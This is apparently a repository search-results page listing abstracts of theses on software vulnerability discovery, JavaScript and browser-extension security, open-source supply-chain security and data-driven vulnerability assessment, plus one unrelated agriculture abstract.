700 research outputs found

    Toward Data-Driven Discovery of Software Vulnerabilities

    Get PDF
    Over the years, Software Engineering, as a discipline, has recognized the potential for engineers to make mistakes and has incorporated processes to prevent such mistakes from becoming exploitable vulnerabilities. These processes span the spectrum from using unit/integration/fuzz testing, static/dynamic/hybrid analysis, and (automatic) patching to discover instances of vulnerabilities to leveraging data mining and machine learning to collect metrics that characterize attributes indicative of vulnerabilities. Among these processes, metrics have the potential to uncover systemic problems in the product, process, or people that could lead to vulnerabilities being introduced, rather than identifying specific instances of vulnerabilities. The insights from metrics can be used to support developers and managers in making decisions to improve the product, process, and/or people with the goal of engineering secure software. Despite empirical evidence of metrics\u27 association with historical software vulnerabilities, their adoption in the software development industry has been limited. The level of granularity at which the metrics are defined, the high false positive rate from models that use the metrics as explanatory variables, and, more importantly, the difficulty in deriving actionable intelligence from the metrics are often cited as factors that inhibit metrics\u27 adoption in practice. Our research vision is to assist software engineers in building secure software by providing a technique that generates scientific, interpretable, and actionable feedback on security as the software evolves. In this dissertation, we present our approach toward achieving this vision through (1) systematization of vulnerability discovery metrics literature, (2) unsupervised generation of metrics-informed security feedback, and (3) continuous developer-in-the-loop improvement of the feedback. We systematically reviewed the literature to enumerate metrics that have been proposed and/or evaluated to be indicative of vulnerabilities in software and to identify the validation criteria used to assess the decision-informing ability of these metrics. In addition to enumerating the metrics, we implemented a subset of these metrics as containerized microservices. We collected the metric values from six large open-source projects and assessed metrics\u27 generalizability across projects, application domains, and programming languages. We then used an unsupervised approach from literature to compute threshold values for each metric and assessed the thresholds\u27 ability to classify risk from historical vulnerabilities. We used the metrics\u27 values, thresholds, and interpretation to provide developers natural language feedback on security as they contributed changes and used a survey to assess their perception of the feedback. We initiated an open dialogue to gain an insight into their expectations from such feedback. In response to developer comments, we assessed the effectiveness of an existing vulnerability discovery approach—static analysis—and that of vulnerability discovery metrics in identifying risk from vulnerability contributing commits

    Studying JavaScript Security Through Static Analysis

    Get PDF
    Mit dem stetigen Wachstum des Internets wĂ€chst auch das Interesse von Angreifern. UrsprĂŒnglich sollte das Internet Menschen verbinden; gleichzeitig benutzen aber Angreifer diese Vernetzung, um Schadprogramme wirksam zu verbreiten. Insbesondere JavaScript ist zu einem beliebten Angriffsvektor geworden, da es Angreifer ermöglicht Bugs und weitere SicherheitslĂŒcken auszunutzen, und somit die Sicherheit und PrivatsphĂ€re der Internetnutzern zu gefĂ€hrden. In dieser Dissertation fokussieren wir uns auf die Erkennung solcher Bedrohungen, indem wir JavaScript Code statisch und effizient analysieren. ZunĂ€chst beschreiben wir unsere zwei Detektoren, welche Methoden des maschinellen Lernens mit statischen Features aus Syntax, Kontroll- und DatenflĂŒssen kombinieren zur Erkennung bösartiger JavaScript Dateien. Wir evaluieren daraufhin die VerlĂ€sslichkeit solcher statischen Systeme, indem wir bösartige JavaScript Dokumente umschreiben, damit sie die syntaktische Struktur von bestehenden gutartigen Skripten reproduzieren. Zuletzt studieren wir die Sicherheit von Browser Extensions. Zu diesem Zweck modellieren wir Extensions mit einem Graph, welcher Kontroll-, Daten-, und NachrichtenflĂŒsse mit Pointer Analysen kombiniert, wodurch wir externe FlĂŒsse aus und zu kritischen Extension-Funktionen erkennen können. Insgesamt wiesen wir 184 verwundbare Chrome Extensions nach, welche die Angreifer ausnutzen könnten, um beispielsweise beliebigen Code im Browser eines Opfers auszufĂŒhren.As the Internet keeps on growing, so does the interest of malicious actors. While the Internet has become widespread and popular to interconnect billions of people, this interconnectivity also simplifies the spread of malicious software. Specifically, JavaScript has become a popular attack vector, as it enables to stealthily exploit bugs and further vulnerabilities to compromise the security and privacy of Internet users. In this thesis, we approach these issues by proposing several systems to statically analyze real-world JavaScript code at scale. First, we focus on the detection of malicious JavaScript samples. To this end, we propose two learning-based pipelines, which leverage syntactic, control and data-flow based features to distinguish benign from malicious inputs. Subsequently, we evaluate the robustness of such static malicious JavaScript detectors in an adversarial setting. For this purpose, we introduce a generic camouflage attack, which consists in rewriting malicious samples to reproduce existing benign syntactic structures. Finally, we consider vulnerable browser extensions. In particular, we abstract an extension source code at a semantic level, including control, data, and message flows, and pointer analysis, to detect suspicious data flows from and toward an extension privileged context. Overall, we report on 184 Chrome extensions that attackers could exploit to, e.g., execute arbitrary code in a victim's browser

    Automated vulnerability detection in source code

    Get PDF
    Technological advances have facilitated instant global connectivity, transforming the way we interact with the world. Software, propelled by this evolution, plays a pivotal role in our daily lives, being present in virtually every facet of our existence. Programmers, who form the bedrock of the business structure, create source code comprising hundreds or even thousands of lines, encompassing essential functionalities for software to operate seamlessly. However, owing to the inherent complexity of these functionalities and their interdependencies, it is common for errors to escape notice in the code, inadvertently reaching the software production phase and resulting in code vulnerabilities Each year, the number ofidentified software vulnerabilities, either publicly disclosed or discovered internally, increases. These vulnerabilities pose a significant risk of exploitation, potentially leading to data breaches or service interruptions. Therefore, the goal of this project is to develop a tool capable of analyzing code written in C and C++ to detect vulnerabilities before the code is deployed to end users. To achieve this goal, we leveraged existing work in this area by using a dataset of open-source functions written in C and C++. This dataset contains approximately 1.27 million functions categorized into five different Common Weakness Enumerations (CWEs). Preprocessing was performed to optimize the performance of the models used. The models were trained on function snippets only, without considering any external context of the code, thus simplifying the problem and increasing processing efficiency. The results obtained are promising, with the trained models showing high performance in identifying and classifying vulnerabilities. In addition, these results can serve as a benchmark for direct comparisons between different approaches.O avanço tecnolĂłgico permitiu uma conexĂŁo global instantĂąnea, transformando a maneira como interagimos com o mundo. Os softwares, impulsionados por essa evolução, desempenham um papel crucial em nosso cotidiano, estando presentes em praticamente todos os aspectos de nossas vidas. Os programadores, fundamentais na estrutura empresarial, desenvolvem o cĂłdigo-fonte composto por centenas ou atĂ© milhares de linhas, incorporando as funcionalidades essenciais para o pleno funcionamento dos softwares. No entanto, devido Ă  complexidade intrĂ­nseca dessas funcionalidades e suas interdependĂȘncias, Ă© comum que erros passem despercebidos no cĂłdigo, chegando inadvertidamente Ă  fase de produção do software e resultando em vulnerabilidades de cĂłdigo. Anualmente, observa-se um aumento no nĂșmero de vulnerabilidades de software que sĂŁo identificadas e divulgadas publicamente ou descobertas internamente. Essas vulnerabilidades representam um sĂ©rio risco e podem resultar em fuga de informaçÔes ou interrupção de serviços. Assim, este projeto visa desenvolver uma ferramenta capaz de analisar o cĂłdigo escrito em C e C++ para identificar vulnerabilidades antes que esse cĂłdigo chegue ao consumidor final. Para alcançar esse objetivo, utilizamos como ponto de partida diversos trabalhos jĂĄ realizados nessa ĂĄrea, fazendo uso de um conjunto de dados contendo funçÔes de cĂłdigo aberto escritas em C e C++. Esse conjunto de dados engloba cerca de 1.27 milhĂ”es de funçÔes categorizadas por cinco diferentes Common Weakness Enumerations (CWEs). Realizamos um prĂ©-processamento para otimizar o desempenho dos modelos utilizados. Os modelos foram treinados apenas em trechos de funçÔes, sem considerar qualquer contexto externo sobre o cĂłdigo, simplificando assim o problema e melhorando a eficiĂȘncia do processamento. Os resultados obtidos sĂŁo promissores, pois os modelos treinados foram capazes de identificar e classificar as vulnerabilidades com alto desempenho, estes resultados podem tambĂ©m servir como base para comparação direta entre diferentes abordagens

    A Human-Centric Approach to Software Vulnerability Discovery

    Get PDF
    Software security bugs | referred to as vulnerabilities | persist as an important and costly challenge. Significant effort has been exerted toward automatic vulnerability discovery, but human intelligence generally remains required and will remain necessary for the foreseeable future. Therefore, many companies have turned to internal and external (e.g., penetration testing, bug bounties) security experts to manually analyze their code for vulnerabilities. Unfortunately, there are a limited number of qualified experts. Therefore, to improve software security, we must understand how experts search for vulnerabilities and how their processes could be made more efficient, by improving tool usability and targeting the most common vulnerabilities. Additionally, we seek to understand how to improve training to increase the number of experts. To answer these questions, I begin with an in-depth qualitative analysis of secure development competition submissions to identify common vulnerabilities developers introduce. I found developers struggle to understand and implement complex security concepts, not recognizing how nuanced development decisions could lead to vulnerabilities. Next, using a cognitive task analysis to investigate experts' and non-experts' vulnerability discovery processes, I observed they use the same process, but dier in the variety of security experiences which inform their searches. Together, these results suggest exposure to an in-depth understanding of potential vulnerabilities as essential for vulnerability discovery. As a first step to leverage both experts and non-experts, I pursued two lines of work: education to support experience development and vulnerability discovery automation interaction improvements. To improve vulnerability discovery tool interaction, I conducted observational interviews of experts' reverse engineering process, an essential and time-consuming component of vulnerability discovery. From this, I provide guidelines for more usable interaction design. For security education, I began with a pedagogical review of security exercises to identify their current strengths and weaknesses. I also developed a psychometric measure for secure software development self-efficacy to support comparisons between educational interventions

    Securing the Next Generation Web

    Get PDF
    With the ever-increasing digitalization of society, the need for secure systems is growing. While some security features, like HTTPS, are popular, securing web applications, and the clients we use to interact with them remains difficult.To secure web applications we focus on both the client-side and server-side. For the client-side, mainly web browsers, we analyze how new security features might solve a problem but introduce new ones. We show this by performing a systematic analysis of the new Content Security Policy (CSP)\ua0 directive navigate-to. In our research, we find that it does introduce new vulnerabilities, to which we recommend countermeasures. We also create AutoNav, a tool capable of automatically suggesting navigation policies for this directive. Finding server-side vulnerabilities in a black-box setting where\ua0 there is no access to the source code is challenging. To improve this, we develop novel black-box methods for automatically finding vulnerabilities. We\ua0 accomplish this by identifying key challenges in web scanning and combining the best of previous methods. Additionally, we leverage SMT solvers to\ua0 further improve the coverage and vulnerability detection rate of scanners.In addition to browsers, browser extensions also play an important role in the web ecosystem. These small programs, e.g. AdBlockers and password\ua0 managers, have powerful APIs and access to sensitive user data like browsing history. By systematically analyzing the extension ecosystem we find new\ua0 static and dynamic methods for detecting both malicious and vulnerable extensions. In addition, we develop a method for detecting malicious extensions\ua0 solely based on the meta-data of downloads over time. We analyze new attack vectors introduced by Google’s new vehicle OS, Android Automotive. This\ua0 is based on Android with the addition of vehicle APIs. Our analysis results in new attacks pertaining to safety, privacy, and availability. Furthermore, we\ua0 create AutoTame, which is designed to analyze third-party apps for vehicles for the vulnerabilities we found

    Security considerations in the open source software ecosystem

    Get PDF
    Open source software plays an important role in the software supply chain, allowing stakeholders to utilize open source components as building blocks in their software, tooling, and infrastructure. But relying on the open source ecosystem introduces unique challenges, both in terms of security and trust, as well as in terms of supply chain reliability. In this dissertation, I investigate approaches, considerations, and encountered challenges of stakeholders in the context of security, privacy, and trustworthiness of the open source software supply chain. Overall, my research aims to empower and support software experts with the knowledge and resources necessary to achieve a more secure and trustworthy open source software ecosystem. In the first part of this dissertation, I describe a research study investigating the security and trust practices in open source projects by interviewing 27 owners, maintainers, and contributors from a diverse set of projects to explore their behind-the-scenes processes, guidance and policies, incident handling, and encountered challenges, finding that participants’ projects are highly diverse in terms of their deployed security measures and trust processes, as well as their underlying motivations. More on the consumer side of the open source software supply chain, I investigated the use of open source components in industry projects by interviewing 25 software developers, architects, and engineers to understand their projects’ processes, decisions, and considerations in the context of external open source code, finding that open source components play an important role in many of the industry projects, and that most projects have some form of company policy or best practice for including external code. On the side of end-user focused software, I present a study investigating the use of software obfuscation in Android applications, which is a recommended practice to protect against plagiarism and repackaging. The study leveraged a multi-pronged approach including a large-scale measurement, a developer survey, and a programming experiment, finding that only 24.92% of apps are obfuscated by their developer, that developers do not fear theft of their own apps, and have difficulties obfuscating their own apps. Lastly, to involve end users themselves, I describe a survey with 200 users of cloud office suites to investigate their security and privacy perceptions and expectations, with findings suggesting that users are generally aware of basic security implications, but lack technical knowledge for envisioning some threat models. The key findings of this dissertation include that open source projects have highly diverse security measures, trust processes, and underlying motivations. That the projects’ security and trust needs are likely best met in ways that consider their individual strengths, limitations, and project stage, especially for smaller projects with limited access to resources. That open source components play an important role in industry projects, and that those projects often have some form of company policy or best practice for including external code, but developers wish for more resources to better audit included components. This dissertation emphasizes the importance of collaboration and shared responsibility in building and maintaining the open source software ecosystem, with developers, maintainers, end users, researchers, and other stakeholders alike ensuring that the ecosystem remains a secure, trustworthy, and healthy resource for everyone to rely on

    Production of Innovations within Farmer–Researcher Associations Applying Transdisciplinary Research Principles

    Get PDF
    Small-scale farmers in sub-Saharan West Africa depend heavily on local resources and local knowledge. Science-based knowledge is likely to aid decision-making in complex situations. In this presentation, we highlight a FiBL-coordinated research partnership between three national producer organisations and national agriculture research bodies in Mali, Burkina Faso, and Benin. The partnership seeks to compare conventional, GMObased, and organic cotton systems as regards food security and climate change

    Towards an Improved Understanding of Software Vulnerability Assessment Using Data-Driven Approaches

    Get PDF
    Software Vulnerabilities (SVs) can expose software systems to cyber-attacks, potentially causing enormous financial and reputational damage for organizations. There have been significant research efforts to detect these SVs so that developers can promptly fix them. However, fixing SVs is complex and time-consuming in practice, and thus developers usually do not have sufficient time and resources to fix all SVs at once. As a result, developers often need SV information, such as exploitability, impact, and overall severity, to prioritize fixing more critical SVs. Such information required for fixing planning and prioritization is typically provided in the SV assessment step of the SV lifecycle. Recently, data-driven methods have been increasingly proposed to automate SV assessment tasks. However, there are still numerous shortcomings with the existing studies on data-driven SV assessment that would hinder their application in practice. This PhD thesis aims to contribute to the growing literature in data-driven SV assessment by investigating and addressing the constant changes in SV data as well as the lacking considerations of source code and developers’ needs for SV assessment that impede the practical applicability of the field. Particularly, we have made the following five contributions in this thesis. (1) We systematize the knowledge of data-driven SV assessment to reveal the best practices of the field and the main challenges affecting its application in practice. Subsequently, we propose various solutions to tackle these challenges to better support the real-world applications of data-driven SV assessment. (2) We first demonstrate the existence of the concept drift (changing data) issue in descriptions of SV reports that current studies have mostly used for predicting the Common Vulnerability Scoring System (CVSS) metrics. We augment report-level SV assessment models with subwords of terms extracted from SV descriptions to help the models more effectively capture the semantics of ever-increasing SVs. (3) We also identify that SV reports are usually released after SV fixing. Thus, we propose using vulnerable code to enable earlier SV assessment without waiting for SV reports. We are the first to use Machine Learning techniques to predict CVSS metrics on the function level leveraging vulnerable statements directly causing SVs and their context in code functions. The performance of our function-level SV assessment models is promising, opening up research opportunities in this new direction. (4) To facilitate continuous integration of software code nowadays, we present a novel deep multi-task learning model, DeepCVA, to simultaneously and efficiently predict multiple CVSS assessment metrics on the commit level, specifically using vulnerability-contributing commits. DeepCVA is the first work that enables practitioners to perform SV assessment as soon as vulnerable changes are added to a codebase, supporting just-in-time prioritization of SV fixing. (5) Besides code artifacts produced from a software project of interest, SV assessment tasks can also benefit from SV crowdsourcing information on developer Question and Answer (Q&A) websites. We automatically retrieve large-scale security/SVrelated posts from these Q&A websites. We then apply a topic modeling technique on these posts to distill developers’ real-world SV concerns that can be used for data-driven SV assessment. Overall, we believe that this thesis has provided evidence-based knowledge and useful guidelines for researchers and practitioners to automate SV assessment using data-driven approaches.Thesis (Ph.D.) -- University of Adelaide, School of Computer Science, 202
    • 

    corecore